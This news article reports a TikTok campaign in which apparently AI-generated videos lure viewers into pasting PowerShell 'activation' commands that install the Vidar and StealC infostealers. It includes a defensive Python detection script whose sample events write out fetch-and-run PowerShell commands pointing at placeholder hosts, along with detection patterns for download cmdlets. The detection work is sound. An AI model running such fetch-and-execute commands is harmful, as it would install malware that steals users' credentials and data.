- Trend Micro spotted a new malware campaign on TikTok
- The videos show how to activate “Premium” features in different software
- The clips were AI-generated and fool victims into downloading infostealers
Hackers are posting AI-generated videos on TikTok to trick users into downloading infostealing malware, cybersecurity researchers at Trend Micro have warned.
The premise is simple: the attackers use AI to generate several videos showing how to easily “activate” Windows and Microsoft Office, or to activate “Premium features” in apps like Spotify or CapCut.
They then share these videos on TikTok, where the algorithm makes it more likely for a video to go viral, which in turn makes the attack more likely to succeed.
A new spin on old tricks
In the clip, a person opens the Run dialog on Windows and then executes a PowerShell command.
While the command in the video results in the activation of special features, users who run the command would download a malicious script that in turn deploys the Vidar and StealC infostealers.
These infostealers can take screenshots, steal login credentials, grab credit card data, exfiltrate cookies, cryptocurrency wallet information, 2FA codes and more.
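For defenders, the behaviour described above (PowerShell started from the Run dialog that fetches a remote script) is visible in process-creation telemetry. The following triage sketch is an added example, not code from Trend Micro or the original article; it assumes Sysmon Event ID 1 style fields, relies on the heuristic that Run-dialog launches appear as children of explorer.exe, and uses constructed sample events with placeholder URLs.

```python
import re

# Constructed process-creation events (Sysmon Event ID 1 style fields); not taken from the campaign.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -c \"iex (irm https://activate.example.invalid/x.ps1)\""},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe"},  # user just opened a console
    {"ParentImage": r"C:\Program Files\Agent\updater.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -File C:\\Agent\\inventory.ps1"},  # managed tooling
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Program Files\PowerShell\7\pwsh.exe",
     "CommandLine": "pwsh -Command \"Invoke-WebRequest https://cdn.example.invalid/a.ps1 -OutFile $env:TEMP\\a.ps1\""},
]

# Cmdlets, aliases and .NET methods commonly used to fetch remote content.
FETCH = re.compile(r"\b(invoke-webrequest|iwr|invoke-restmethod|irm|downloadstring|downloadfile|curl|wget)\b", re.I)
# Execution of fetched text directly in memory.
EXEC = re.compile(r"\b(invoke-expression|iex)\b", re.I)
URL = re.compile(r"https?://[^\s'\")]+", re.I)

def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def triage(event):
    """Return (severity, urls); severity is None when the event is not of interest."""
    if basename(event["Image"]) not in ("powershell.exe", "pwsh.exe"):
        return None, []
    if basename(event["ParentImage"]) != "explorer.exe":
        return None, []  # not an interactive launch from the shell
    cmd = event["CommandLine"]
    if not FETCH.search(cmd):
        return None, []
    # Fetch plus in-memory execution is the stronger signal; fetch alone is still worth review.
    severity = "high" if EXEC.search(cmd) else "medium"
    return severity, URL.findall(cmd)

def scan(events):
    hits = []
    for index, event in enumerate(events):
        severity, urls = triage(event)
        if severity:
            hits.append((index, severity, urls))
    return hits
```

The extracted URLs can be checked against proxy or DNS logs to find other hosts that contacted the same download location.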
“This attack uses videos (possibly AI-generated) to direct users to perform PowerShell commands disguised as software activation steps. TikTok’s algorithmic range increases the likelihood of widespread exposure where a video reaches more than half a million views,” Trend Micro said.
“The videos are very similar, with only minor differences in camera angles and download URLs used by PowerShell to pick up the payload,” the researchers added.
“These suggest that the videos were likely to be created through automation.”
One of the videos has approx. 500,000 views, more than 20,000 likes and more than 100 comments, making it quite successful.
Videos were also used to deliver malware in the past, but this new campaign is a significant deviation from previous methods.
The difference is that, previously, the link to the malware was shared in the video’s description or comments, where it could still be picked up by security solutions. By delivering the bait in a video format, attackers successfully bypass almost all security measures.
Via BleepingComputer



